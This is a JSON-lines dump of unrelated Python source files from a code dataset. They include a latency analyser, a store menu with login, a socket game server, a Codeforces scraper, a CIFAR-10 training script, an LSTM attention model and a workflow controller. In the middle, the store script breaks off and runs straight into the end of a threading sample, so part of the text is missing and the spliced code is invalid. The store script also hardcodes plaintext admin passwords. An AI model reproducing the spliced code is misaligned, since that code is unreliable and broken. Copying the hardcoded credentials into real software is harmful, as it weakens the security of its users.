Run the bot on server\nbot.run('token')","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"620627037","text":"#!/usr/bin/python3\n\n\nimport os\nimport sys\nimport argparse\nimport re\n\n#parse the parameters\ndef parseArgs():\n\tparser = argparse.ArgumentParser(\n\t\tformatter_class=argparse.ArgumentDefaultsHelpFormatter,\n \tdescription='measure the resource usage')\n\tparser.add_argument('--clean', action = 'store_true',\n\t\t\t\t\t\t\t help = 'clean the .data files')\n\treturn parser.parse_args()\n\ndef find_file(filelist, string):\n\tfor file in filelist:\n\t\tif string in file:\n\t\t\treturn file\n\n\ndef latency(root, filelist):\n\tworker_num = len(filelist) // 2\n\tfor i in range(2, worker_num+2):\n\t\tfile_worker = find_file(filelist, str('gpu%d'%(i)))\n\t\tfile_server = find_file(filelist, str('192.168.2.4%d'%(i)))\n\t\tfd_worker = open(root+'/'+file_worker, 'r')\n\t\tfd_server = open(root+'/'+file_server, 'r')\n\t\tfd_output = open(root+'/latency_gpu%d.csv'%(i), 'w')\n\t\tcount = 0\n\t\twhile True:\n\t\t\tline_worker = fd_worker.readline()\n\t\t\tline_server = fd_server.readline()\n\t\t\tif not line_server or not line_worker:\n\t\t\t\tbreak;\n\t\t\tcount += 1\n\n\t\t\tlatency_result = list()\n\t\t\tpart_worker = line_worker.split(',')\n\t\t\tpart_server = line_server.split(',')\n\n\t\t\tif part_server[1] == part_worker[1] and part_worker[2] == part_server[2]:\n\t\t\t\tlatency_result.append(part_server[1])\n\t\t\t\tlatency_result.append(part_server[2])\n\t\t\t\tlatency_result.append(str((int(part_server[3]) - int(part_worker[3]))/1000000))\n\t\t\telse: print(\"analysis error\"); exit()\n\n\t\t\tfd_output.write(','.join(latency_result) + '\\n')\n\n\n\t\tfd_server.close()\n\t\tfd_worker.close()\n\t\tfd_output.close()\n\n\ndef cleanfile(root):\n\tcmd = \"rm -f %s/latency_gpu*\"%(root)\n\tos.system(cmd)\n\n\n\nif __name__ == '__main__':\n\targs = parseArgs()\n\tfor root, dirs, files in os.walk('./'):\n\t\tprint(root, dirs, files)\n\t\tif len(dirs) == 0: #the dirs contains the .csv files\n\t\t\tif args.clean:\n\t\t\t\tcleanfile(root)\n\t\t\telse:\n\t\t\t\tlatency(root, files)\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"231798057","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 25 21:14:59 2020\r\n\r\n@author: user\r\n\"\"\"\r\n\r\n#Importamos cada una de las variables del archivo \r\nfrom lifestore_file import lifestore_searches, lifestore_sales, lifestore_products\r\n\r\n#print(lifestore_products) #Se comprueba que imprime la variable correctamente\r\n\r\n\r\n\r\nusuarios_admin=[[\"Patricia\",\"123\"],[\"Alejandra\",\"hola\"],[\"Daniel\",\"perro\"],[\"Mai\",\"gato\"]]\r\n\r\nes_admin=0\r\n\r\nwhile es_admin==0:\r\n usuario_entrada=input(\"Ingresa tu nombre de usuario: \")\r\n usuario_clave=input(\"Ingresa tu clave de acceso: \")\r\n\r\n for usuario in usuarios_admin:\r\n if usuario[0]==usuario_entrada and usuario[1]==usuario_clave:\r\n es_admin=1\r\n else:\r\n continue\r\n \r\nif es_admin==1:\r\n print(\"Bienvenido a Lifestore\")\r\n \r\n print(\"Elige una opcion del menu: \\n 1.Conocer los 50 productos con mayores y menores ventas: a \\n 2.Productos con mejores y peores resenas: b \\n 3.Productos mas y menos buscados: c\")\r\n opcion_seleccionada=input(\"Opcion: \")\r\n op_correcta=0\r\n \r\n while op_correcta==0:\r\n if opcion_seleccionada==\"a\":\r\n print(\"Seleccionaste a\")\r\n opcion=1\r\n op_correcta=1\r\n \r\n contador=0\r\n total_ventas=[] #[[id,contador],[id2, contador2]]\r\n \r\n for producto in lifestore_products:\r\n for venta in lifestore_sales:\r\n if producto[0]==venta[1]:\r\n contador+=1\r\n \r\n formato=[producto[0], producto[1], contador]\r\n #formato=[producto[0],contador]\r\n total_ventas.append(formato)\r\n contador=0\r\n \r\n \r\n ventas_ordenada=[]\r\n \r\n while total_ventas:\r\n minimo=total_ventas[0][2]\r\n lista_actual=total_ventas[0]\r\n for venta in total_ventas:\r\n if venta[2]= 10):\n\t\t\ton = False\n\np = threading.Thread(target=print_tick)\ns = threading.Thread(target=stoppen)\n\np.start()\ns.start()\t\t\t\ns.join()","sub_path":"Samples/processen.py","file_name":"processen.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"5205554","text":"#!/usr/bin/env python\nfrom setuptools import setup, find_packages\nimport sys\n\n\ndef _str_to_version_tuple(version):\n return tuple([int(i) for i in version.split('.')])\n\n\nlxml_requirement = \"lxml\"\nif sys.platform == 'darwin':\n import platform\n # Solve bad case of comparison like 10.9 v.s. 10.10.1\n mac_ver = _str_to_version_tuple(platform.mac_ver()[0])\n cutoff_ver= _str_to_version_tuple('10.9')\n if mac_ver < cutoff_ver:\n print(\"Using lxml<2.4\")\n lxml_requirement = \"lxml<2.4\"\n\nsetup(\n name=\"PyReadability\",\n version=\"0.4.0\",\n author=\"Yuri Baburov\",\n author_email=\"burchik@gmail.com\",\n description=\"fast python port of arc90's readability tool\",\n test_suite = \"tests.test_article_only\",\n long_description=open(\"README\").read(),\n license=\"Apache License 2.0\",\n url=\"http://github.com/hyperlinkapp/python-readability\",\n packages=['readability'],\n install_requires=[\n \"chardet\",\n \"cssselect\",\n lxml_requirement\n ],\n classifiers=[\n \"Environment :: Web Environment\",\n \"Intended Audience :: Developers\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n ],\n)\n","sub_path":"pypi_install_script/PyReadability-0.4.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"232005612","text":"import socket\nfrom threading import Thread,Lock\nimport random\nimport sys\nfrom multiprocessing import Process,Queue\n\nHOST ='0.0.0.0'\nPORT = 5000\nBUFSIZ = 1024\nADDR = (HOST, PORT)\nlock_ranking = Lock()\n\n\nclass Ranking:\n \n def __init__(self,lock):\n self.high_scores = []\n self.lock = lock\n \n def add_highscore(self,highscore_novo):\n self.lock.acquire()\n presente = False\n for highscore in self.high_scores:\n if(highscore[0] == highscore_novo[0]):\n highscore_atualizado = (highscore[0],(highscore[1]+highscore_novo[1]))\n self.high_scores.append(highscore_atualizado)\n self.high_scores.remove(highscore)\n presente = True\n if(not presente):\n self.high_scores.append(highscore_novo)\n self.sort()\n self.lock.release()\n\n def sort(self):\n self.high_scores.sort(key=lambda tup: tup[1], reverse=True)\n \n def __str__(self):\n string = \"\"\n\n for highscore in self.high_scores:\n string += \"{}\\t{} \\n\".format(str(highscore[1]),highscore[0])\n return string\n\nclass SocketHandleProcess(Process):\n def __init__(self,queue_highscores,client_sock,addr,rank):\n Process.__init__(self)\n self.queue_highscores = queue_highscores\n self.client_sock = client_sock\n self.addr = addr\n self.rank = rank\n def run(self):\n socketHandle(self.client_sock,self.addr,True,self.queue_highscores)\n\n \ndef rankingWatcher(queue_highscores):\n while True:\n rank.add_highscore(queue_highscores.get())\n\n\n\ndef socketHandle(client_sock,addr,flag_process,queue_highscores='none'):\n print('Client connected from: ', addr)\n while True:\n \n data = client_sock.recv(BUFSIZ).strip()\n data = data.decode(\"utf-8\")\n token = data.split(':')\n \n if token[0].upper() == 'END':\n break\n elif token[0].upper() == 'RANKING':\n \n print(\"OK - {} Pediu Rank\".format(addr))\n client_sock.send((\"\\nRanking Geral\\n\\n{}\\n\\n\".format(rank)).encode('utf-8'))\n\n elif token[0].upper() == 'NOME':\n print(\"{} chama-se {}\".format(addr[0],token[1]))\n \n nome = token[1]\n numeros = []\n for x in range(5):\n numeros.append(random.randint(1,6))\n \n pontuacoes = []\n for numero in numeros:\n correspondencias=0\n for outronumero in numeros:\n if(numero == outronumero):\n correspondencias +=1\n pontuacoes.append(correspondencias)\n score=0\n if(max(pontuacoes) ==3):\n score=10\n elif(max(pontuacoes)==4):\n score=100\n elif(max(pontuacoes)==5):\n score=1000\n\n if score!=0:\n highscore = (nome.upper(),score)\n if(flag_process):\n queue_highscores.put(highscore)\n \n else:\n rank.add_highscore(highscore)\n\n\n response= \"\\n\\nResultado da Partida\\nDados Sorteados: {} \\nPontuação: {}\\n\".format(numeros,score)\n print(numeros)\n client_sock.send(response.encode('utf-8'))\n\n \n print(\"Received from client {}: {}\".format(addr[0],token))\n \n client_sock.close()\n sys.exit()\n\n\n\n \n \n\nif __name__ == '__main__':\n # server setup\n server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n server_socket.bind(ADDR)\n server_socket.listen(5)\n server_socket.setsockopt( socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n rank = Ranking(lock_ranking)\n \n \n while True:\n opt = input(\"Configuração do servidor!\\nDigite 1 para executar usando Threads, ou 2 para Processos.\")\n if (opt == '1'):\n # threads\n while True:\n print(\"rank: {}\\n\".format(rank.high_scores))\n print('Server waiting for connection...{}'.format(ADDR))\n client_sock, addr = server_socket.accept()\n t1 = Thread(target=socketHandle,args=(client_sock,addr, False))\n t1.start()\n \n\n pass\n elif(opt == '2'):\n queue_highscores = Queue()\n t1 = Thread(target=rankingWatcher,args=[queue_highscores])\n t1.start()\n while True:\n print(\"rank: {}\\n\".format(rank.high_scores))\n print('Server waiting for connection...{}'.format(PORT))\n client_sock, addr = server_socket.accept()\n \n p1 = SocketHandleProcess(queue_highscores,client_sock,addr,rank.high_scores)\n p1.start()\n \n \n else:\n print(\"Opção Inválida!\")\n","sub_path":"servidor/servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"274345673","text":"from pyquery import PyQuery as pq\nimport requests\nimport time\n\n\ndef solve_tr(tr):\n \"\"\"\n 解析我们所需要的内容\n :param tr: tr元素\n :return: dict\n \"\"\"\n problemName = tr.find('.status-small>a').text()\n state = tr.find(':nth-child(6)').text()\n it = {'problemName': problemName, 'state': state}\n return it\n\n\ndef get_pages_num(doc):\n \"\"\"\n 获取需要爬取的页码数量\n :param doc: pyquery返回的解析器\n :return: int,页码数量\n \"\"\"\n try:\n length = doc.find('#pageContent>.pagination>ul>*').length\n last_li = doc.find('#pageContent>.pagination>ul>li:nth-child(' + str(length-1) + ')')\n # print('length', length)\n print(last_li.text())\n # for item in items:\n # print(item)\n\n return max(1, int(last_li.text()))\n\n except Exception :\n return None\n\n\ndef crawl_one_page(doc):\n \"\"\"\n 爬取每一页中的内容\n :param doc: pyquery返回的解析器\n \"\"\"\n items = doc.find('[data-submission-id]').items()\n for item in items:\n it = solve_tr(item)\n with open('data.txt', 'a+', encoding='utf-8') as f:\n f.write(str(it) + '\\n')\n print(it)\n\n\ndef get_username():\n \"\"\"\n 获取用户名\n :return:\n \"\"\"\n username = input('请输入用户名:')\n return username\n\n\ndef main():\n base = 'https://codeforces.com/submissions/'\n username = get_username()\n url = base+username+'/page/1'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'\n }\n\n response = requests.get(url=url, headers=headers)\n doc = pq(response.text)\n # 注释部分为测试代码\n # crawl_one_page(doc)\n # with open('index.html', 'w', encoding='utf-8') as f:\n # f.write(doc.text())\n num = get_pages_num(doc)\n\n if num is not None:\n for i in range(1, num + 1):\n url = base+username+'/page/'+str(i)\n print(url)\n response = requests.get(url=url)\n doc = pq(response.text)\n crawl_one_page(doc)\n time.sleep(2)\n\n else:\n print('username is no exist or you are no submission')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"codeforces.py","file_name":"codeforces.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"595307185","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## 1. Import Necessary Modules\n\n# In[1]:\n\n\nimport os\n\nimport matplotlib.pyplot as plt\n\nfrom altusi import utils\nimport altusi.utils.visualizer as vis\nimport altusi.configs.config as cfg\nfrom altusi.utils.logger import *\n\n\n# In[2]:\n\n\nimport numpy as np\n\nimport mxnet as mx\nfrom mxnet import nd, autograd, gluon, context\nfrom mxnet.gluon.data.vision import transforms, CIFAR10\nfrom gluoncv.data import transforms as gcv_transforms\n\n\n# ## 2. Prepare Data\n\n# ### 2.1 Define Data Transformers\n\n# In[3]:\n\n\ntrain_transformer = transforms.Compose([\n gcv_transforms.RandomCrop(cfg.IMAGE_SIZE, pad=4),\n transforms.RandomFlipLeftRight(),\n transforms.ToTensor(),\n transforms.Normalize(cfg.CIFAR10_MEAN, cfg.CIFAR10_STD)\n])\n\ntest_transformer = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(cfg.CIFAR10_MEAN, cfg.CIFAR10_STD)\n])\n\nLOG(INFO, 'Data Transformers defining done')\n\n\n# ### 2.2 Load Dataset\n\n# In[4]:\n\n\ntrain_dataset = CIFAR10(train=True)\ntest_dataset = CIFAR10(train=False)\n\nLOG(INFO, 'Dataset loading done')\n\n\n# ### 2.3 Define Data Loaders\n\n# In[6]:\n\n\nBATCH_SIZE = cfg.BATCH_SIZE\n\ntrain_loader = gluon.data.DataLoader(\n train_dataset.transform_first(train_transformer),\n batch_size=BATCH_SIZE,\n shuffle=True,\n num_workers=4\n)\n\ntest_loader = gluon.data.DataLoader(\n test_dataset.transform_first(test_transformer),\n batch_size=BATCH_SIZE,\n num_workers=4\n)\n\nLOG(INFO, 'Data Loaders defining done')\n\n\n# ## 3. Setup Training System\n\n# In[7]:\n\n\nfrom altusi.models import AlexNet\nfrom altusi.models import VGG11, VGG13, VGG16, VGG19\nfrom altusi.models import ResNet18, ResNet34, ResNet50, ResNet101, ResNet152\nfrom altusi.models import DenseNet121, DenseNet161, DenseNet169, DenseNet201\nfrom altusi.models import GoogleNet\n\n# AlexNet architecture\n# net = AlexNet(nclasses=cfg.CIFAR_NCLASSES); model_name = 'AlexNet'\n\n# VGG architectures\n# net = VGG11(nclasses=cfg.CIFAR_NCLASSES); model_name = 'VGG11'\n# net = VGG13(nclasses=cfg.CIFAR_NCLASSES); model_name = 'VGG13'\n# net = VGG16(nclasses=cfg.CIFAR_NCLASSES); model_name = 'VGG16'\n# net = VGG19(nclasses=cfg.CIFAR_NCLASSES); model_name = 'VGG19'\n\n# ResNet architectures\n# net = ResNet18(nclasses=cfg.CIFAR_NCLASSES); model_name = 'ResNet18'\n# net = ResNet34(nclasses=cfg.CIFAR_NCLASSES); model_name = 'ResNet34'\n# net = ResNet50(nclasses=cfg.CIFAR_NCLASSES); model_name = 'ResNet50'\n# net = ResNet101(nclasses=cfg.CIFAR_NCLASSES); model_name = 'ResNet101'\n# net = ResNet152(nclasses=cfg.CIFAR_NCLASSES); model_name = 'ResNet152'\n\n# DenseNet architectures\n# net = DenseNet121(nclasses=cfg.CIFAR_NCLASSES); model_name = 'DenseNet121'\n# net = DenseNet161(nclasses=cfg.CIFAR_NCLASSES); model_name = 'DenseNet161'\n# net = DenseNet169(nclasses=cfg.CIFAR_NCLASSES); model_name = 'DenseNet169'\n# net = DenseNet201(nclasses=cfg.CIFAR_NCLASSES); model_name = 'DenseNet201'\n\n\n# GoogleNet architecture\nnet = GoogleNet(nclasses=cfg.CIFAR_NCLASSES); model_name = 'GoogleNet'\n\nLOG(INFO, '{} Network setup done'.format(model_name))\n\n\n# In[8]:\n\n\nnet.hybridize()\nnet.initialize()\n\nX = nd.random.uniform(shape=(1, 3, 32, 32))\n\nnet(X)\n\n\n# In[9]:\n\n\nnet\n\n\n# In[10]:\n\n\nctx = context.gpu(0) if context.num_gpus() else context.cpu()\n\nLOG(INFO, 'Device in Use:', ctx)\n\n\n# In[11]:\n\n\ncriterion = gluon.loss.SoftmaxCrossEntropyLoss()\noptimizer = 'sgd'\n\nnet.initialize(init=mx.init.Xavier(), ctx=ctx, force_reinit=True)\nnet.hybridize()\n\ntrainer = gluon.Trainer(\n net.collect_params(),\n optimizer,\n {'learning_rate':cfg.LR, 'wd':cfg.WD, 'momentum':cfg.MOMENTUM}\n)\n\nLOG(INFO, 'Training system setup done')\n\n\n# ## 4. Training Procedure\n\n# In[12]:\n\n\ndef evaluate_accuracy_loss(net, loader, criterion, ctx):\n metric = mx.metric.Accuracy()\n loss = 0\n sample_cnt = 0\n \n for i, (X, y) in enumerate(loader):\n X, y = X.as_in_context(ctx), y.as_in_context(ctx)\n \n y_hat = net(X)\n l = criterion(y_hat, y)\n \n metric.update(labels=[y], preds=[y_hat])\n loss += l.sum().asscalar()\n sample_cnt += X.shape[0]\n \n return metric.get(), loss / sample_cnt\n\n\n# In[13]:\n\n\nanimator = vis.Animator(\n title=model_name, xlabel='epoch',\n legend=['train-acc', 'train-loss', 'val-acc', 'val-loss'],\n xlim=[0, cfg.NEPOCHS],\n figsize=(8, 6)\n)\n\nLR_DECAY_EPOCHS = [40, 70] + [np.inf]\nlr_decay_idx = 0\n\ntrain_metric = mx.metric.Accuracy()\nbest_val_acc = 0\n\nfor epoch in range(cfg.NEPOCHS):\n train_metric.reset()\n train_loss_total = 0\n sample_cnt = 0\n \n if epoch == LR_DECAY_EPOCHS[lr_decay_idx]:\n trainer.set_learning_rate(trainer.learning_rate * cfg.LR_DECAY_FACTOR)\n lr_decay_idx += 1\n \n for i, (X, y) in enumerate(train_loader):\n X, y = X.as_in_context(ctx), y.as_in_context(ctx)\n \n with autograd.record():\n y_hat = net(X)\n l = criterion(y_hat, y)\n l.backward()\n trainer.step(X.shape[0])\n \n train_metric.update(labels=[y], preds=[y_hat])\n train_loss_total += l.sum().asscalar()\n sample_cnt += X.shape[0]\n \n name, train_acc = train_metric.get()\n train_loss = train_loss_total / sample_cnt\n \n if (i+1) % 50 == 0 or i+1 == len(train_loader):\n animator.add(epoch + i/len(train_loader), \n (train_acc, train_loss, None, None))\n \n (name, val_acc), val_loss = evaluate_accuracy_loss(net, test_loader, criterion, ctx)\n animator.add(epoch+1, (None, None, val_acc, val_loss))\n \n if best_val_acc < val_acc:\n best_val_acc = val_acc\n saved_model_name = '{}-epoch-{:02d}-acc-{:.4f}.params'.format(\n model_name.lower(), epoch+1, best_val_acc)\n net.save_parameters(os.path.join(cfg.CHECKPOINTS, saved_model_name))\n \n LOG(INFO, 'Epoch:', epoch+1)\n LOG(INFO, '\\ttrain-acc: {:.6f}'.format(train_acc))\n LOG(INFO, '\\ttrain-loss: {:.6f}'.format(train_loss))\n LOG(INFO, '\\tval-acc: {:.6f}'.format(val_acc))\n LOG(INFO, '\\tval-loss: {:.6f}'.format(val_loss))\n \n \nhistory_image_name = '{}-acc-{:.4f}.png'.format(model_name.lower(), best_val_acc)\nanimator.savefig(save_path=os.path.join(cfg.HISTORY, history_image_name))\n\nLOG(INFO, 'Training Procedure done')\n\n\n# ## 5. Test Procedure\n\n# ### 5.1 Load Trained Model\n\n\n\n\n\n","sub_path":"cifar10-end2end.py","file_name":"cifar10-end2end.py","file_ext":"py","file_size_in_byte":6349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"613149298","text":"\n# coding: utf-8\n\n# In[ ]:\n\n\n\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib import rnn\n# from attention import attention\n\n\nclass LSTM_Network(object):\n \"\"\"\n Lstm Network\n \"\"\"\n def __init__(self, vocab_size_, dropout_value_, embedding_dim_, forget_bias_, rnn_num_units):\n \"\"\"\n Multi layer Bi-directional LSTM\n In a single layer RNN, the output is produced by passing it through a single hidden\n state which fails to capture hierarchical (think temporal) structure of a sequence.\n With a multi-layered RNN, such structure is captured which results in better performance.\n :param vocab_size_:\n vocabulary size\n :param dropout_value_:\n dropout for neurons\n :param embedding_dim_:\n word_embedding dimension\n :param forget_bias_:\n forget_bias for LSTM cell gates {default : 1}\n Including a bias of 1 to the forget gate of every LSTM cell is also shown to improve performance.\n :param rnn_num_units:\n # of units Lstm cell\n :return\n loss\n prediction\n probability\n logits\n accuracy\n :raise:\n if input shape is different from placeholder shape:\n ValueError: Cannot feed value of shape\n if Any layer output shape is not compatible for next layer input shape :\n { ex : output shape of rnn to input shape of fully connected layer }\n ValueError: Dimensions must be equal\n if not reset the graph:\n ValueError: Attempt to have a second RNNCell use the\n weights of a variable scope that already has weights\n \"\"\"\n tf.reset_default_graph()\n\n\n # placeholders\n sentence_input = tf.placeholder(\n name='input',\n shape=[None, None],\n dtype=tf.int32)\n\n label_s = tf.placeholder(\n name='output',\n shape=[None, ],\n dtype=tf.int32\n\n )\n\n dropout_mode = tf.placeholder(\n name='mode',\n shape=(),\n dtype=tf.int32\n )\n\n self.placeholder = {\n\n 'input': sentence_input,\n 'label_s': label_s,\n 'dropout_mode': dropout_mode\n\n }\n\n sequence_len = tf.count_nonzero(sentence_input, axis=-1)\n # sequence length for rnn unfolding\n\n dropout = tf.cond(\n tf.equal(dropout_mode, 0), # If\n lambda: dropout_value_, # True\n lambda: 0. # False\n )\n\n # word_embedding and embedding lookup\n word_embedding_ = tf.get_variable(name='embeddings_',\n shape=[vocab_size_, embedding_dim_],\n dtype=tf.float32,\n initializer=tf.random_uniform_initializer(-0.01, 0.01))\n\n embedding_lookup = tf.nn.embedding_lookup(word_embedding_, sentence_input)\n\n with tf.variable_scope('encoder'):\n # forward cell of Bi-directional lstm network\n\n\n\n def fr_cell():\n fr_cell_lstm = rnn.LSTMCell(num_units=rnn_num_units, forget_bias=forget_bias_)\n\n return rnn.DropoutWrapper(cell=fr_cell_lstm, output_keep_prob=1. - dropout, dtype=tf.float32)\n # dropout layer for forward cell\n\n # Forward RNNCells as its inputs and wraps them into a single cell\n\n fr_cell_m = rnn.MultiRNNCell([fr_cell() for _ in range(1)], state_is_tuple=True)\n # fr_initial_cell = fr_cell_m.zero_state(batch_size=batch_size,dtype=tf.float32)\n\n\n\n with tf.variable_scope('encoder'):\n # backward cell for Bi-directional lstm network\n\n\n\n def bw_cell():\n bw_cell_lstm = rnn.LSTMCell(num_units=rnn_num_units, forget_bias=forget_bias_)\n\n return rnn.DropoutWrapper(cell=bw_cell_lstm, output_keep_prob=1. - dropout, dtype=tf.float32)\n # droput layer for backward cell\n\n # Backward RNNCells as its inputs and wraps them into a single cell\n\n bw_cell_m = rnn.MultiRNNCell([bw_cell() for _ in range(1)], state_is_tuple=True)\n\n\n # bw_initial_cell = bw_cell_m.zero_state(batch_size=batch_size,dtype=tf.float32)\n\n\n # return of Bi-directional lstm network :\n\n # A tuple (outputs, output_states) where:\n\n # outputs : A tuple (output_fw, output_bw) containing the forward and the backward rnn output Tensor #batch_size, max_time, cell_fw.output_size]\n # output_states : A tuple ( state.cT , state.hT ) containing the shape [Batch_size,num_inputs] and has the final cell state cT and output state hT of each batch sequence.\n\n # Bi-directional lstm network\n with tf.variable_scope('encoder') as scope:\n model, (state_c, state_h) = tf.nn.bidirectional_dynamic_rnn(\n cell_fw=fr_cell_m, # forward cell\n cell_bw=bw_cell_m, # backward cell\n inputs=embedding_lookup, # 3 dim embedding input for rnn\n sequence_length=sequence_len, # sequence len == batch_size\n\n # initial_state_fw=fr_initial_cell,\n\n # initial_state_bw=bw_initial_cell,\n dtype=tf.float32\n\n )\n\n transpose = tf.concat(model, 2)\n \n #Attention_layer \n \n x_attention = tf.reshape(transpose,[-1,rnn_num_units*2])\n attention_size=tf.get_variable(name='attention',shape=[rnn_num_units*2,1],dtype=tf.float32,initializer=tf.random_uniform_initializer(-0.01,0.01))\n bias_ = tf.get_variable(name='bias_',shape=[1],dtype=tf.float32,initializer=tf.random_uniform_initializer(-0.01,0.01))\n linear_projection = tf.add(tf.matmul(x_attention,attention_size),bias_)\n# print(sentence_input.shape[0])\n reshape_ = tf.reshape(linear_projection,[tf.shape(sentence_input)[0],tf.shape(sentence_input)[1],-1])\n attention_output=tf.nn.softmax(reshape_,dim=1)\n \n atten_visualize=tf.reshape(attention_output,[tf.shape(sentence_input)[0],tf.shape(sentence_input)[1]],name='plot_dis')\n \n multi = tf.multiply(attention_output,transpose)\n \n\n atten_out_s = tf.reduce_sum(multi,1)\n\n# attention_visualize = tf.reshape(atten_out,[tf.shape(sentence_input)[0],tf.shape(sentence_input)[1]])\n \n \n \n \n \n \n\n\n \n\n \n \n \n \n\n# state_output = tf.concat([state_c[0].c, state_h[0].c], axis=-1)\n\n # Attention Mechanism\n\n # Attention_output,alphas= attention(transpose ,30, return_alphas=True,time_major=False)\n\n\n# # will return [batch_size, output_state_size]\n weights = tf.get_variable(name='weights',\n shape=[2*rnn_num_units, 2],\n dtype=tf.float32,\n initializer=tf.random_uniform_initializer(-0.01, 0.01))\n\n bias = tf.get_variable(name='bias',\n shape=[2],\n dtype=tf.float32,\n initializer=tf.random_uniform_initializer(-0.01, 0.01))\n\n logits = tf.add(tf.matmul(atten_out_s, weights),\n bias, name='network_output')\n\n# # # self.check_shapes={'embedding':embedding_lookup,'model':model,'tr':transpose,'atten':attention_output,'al':alphas,'outa':mat_out}\n\n probability_distribution = tf.nn.softmax(logits, name='netout')\n\n prediction = tf.argmax(probability_distribution, axis=-1)\n\n # cross entropy\n ce = tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits=logits,\n labels=label_s\n )\n # loss\n loss = tf.reduce_mean(ce)\n\n # accuracy calculation\n\n accuracy_calculation = tf.reduce_mean(tf.cast(\n tf.equal(\n tf.cast(prediction, tf.int32), label_s),\n tf.float32))\n\n self.output = {\n\n\n 'loss': loss,\n 'prob': probability_distribution,\n 'pred': prediction,\n 'logits': logits,\n 'accuracy': accuracy_calculation\n\n }\n\n self.train = tf.train.AdamOptimizer().minimize(loss)\n\n\n# uncomment below code for demo\n\n\n# def checking_model(model):\n# with tf.Session() as sess:\n# sess.run(tf.global_variables_initializer())\n# out_now=sess.run(model.output,feed_dict={model.placeholder['input']:np.random.randint(0,10,[16,10]),model.placeholder['label_s']:np.random.randint(0,2,[16,]),model.placeholder['dropout_mode']:0})\n# print(out_now['loss'].shape)\n# print(out_now['prob'].shape)\n \n\n\n# if __name__==\"__main__\":\n\n# model=LSTM_Network(10,0.5,2,1.0,6)\n\n# checking_model(model)\n\n","sub_path":"Models/Lstm_attention.py","file_name":"Lstm_attention.py","file_ext":"py","file_size_in_byte":8948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"484360681","text":"import os\nfrom collections import namedtuple\nfrom concurrent import futures\nfrom copy import deepcopy\nfrom os import sep\nfrom xml.etree import cElementTree\nimport uuid\n\nfrom apscheduler.events import EVENT_JOB_EXECUTED, EVENT_JOB_ERROR, EVENT_JOB_ADDED, EVENT_JOB_REMOVED, \\\n EVENT_SCHEDULER_START, EVENT_SCHEDULER_SHUTDOWN, EVENT_SCHEDULER_PAUSED, EVENT_SCHEDULER_RESUMED\nfrom apscheduler.schedulers.base import STATE_PAUSED, STATE_RUNNING, STATE_STOPPED\nfrom apscheduler.schedulers.gevent import GeventScheduler\n\nimport core.config.config\nimport core.config.paths\nfrom core import workflow as wf\nfrom core.case import callbacks\nfrom core.case import subscription\nfrom core.helpers import locate_workflows_in_directory, construct_workflow_name_key, extract_workflow_name\n\n_WorkflowKey = namedtuple('WorkflowKey', ['playbook', 'workflow'])\n\npool = None\nworkflows = None\nthreading_is_initialized = False\n\n\ndef initialize_threading():\n global pool\n global workflows\n global threading_is_initialized\n\n workflows = []\n\n pool = futures.ThreadPoolExecutor(max_workers=core.config.config.num_threads)\n threading_is_initialized = True\n\n\ndef shutdown_pool():\n global pool\n global workflows\n global threading_is_initialized\n\n for future in futures.as_completed(workflows):\n future.result(timeout=core.config.config.threadpool_shutdown_timeout_sec)\n pool.shutdown(wait=False)\n\n workflows = []\n threading_is_initialized = False\n\n\ndef execute_workflow_worker(workflow, start, subs):\n subscription.set_subscriptions(subs)\n workflow.execute(start=start)\n return \"done\"\n\n\nclass Controller(object):\n def __init__(self, name='defaultController', workflows_path=core.config.paths.workflows_path):\n self.name = name\n self.workflows = {}\n self.load_all_workflows_from_directory(path=workflows_path)\n self.instances = {}\n self.tree = None\n\n self.scheduler = GeventScheduler()\n self.scheduler.add_listener(self.__scheduler_listener(),\n EVENT_SCHEDULER_START | EVENT_SCHEDULER_SHUTDOWN\n | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED\n | EVENT_JOB_ADDED | EVENT_JOB_REMOVED\n | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR)\n self.ancestry = [self.name]\n self.paused_workflows = {}\n\n def reconstruct_ancestry(self):\n for key in self.workflows:\n self.workflows[key].reconstruct_ancestry(self.ancestry)\n\n def load_workflow_from_file(self, path, workflow_name, name_override=None, playbook_override=None):\n self.tree = cElementTree.ElementTree(file=path)\n playbook_name = playbook_override if playbook_override else os.path.splitext(os.path.basename(path))[0]\n for workflow in self.tree.iter(tag='workflow'):\n current_workflow_name = workflow.get('name')\n if current_workflow_name == workflow_name:\n if name_override:\n workflow_name = name_override\n name = construct_workflow_name_key(playbook_name, workflow_name)\n key = _WorkflowKey(playbook_name, workflow_name)\n self.workflows[key] = wf.Workflow(name=name,\n xml=workflow,\n parent_name=self.name,\n playbook_name=playbook_name)\n break\n else:\n return False\n\n self.add_child_workflows()\n 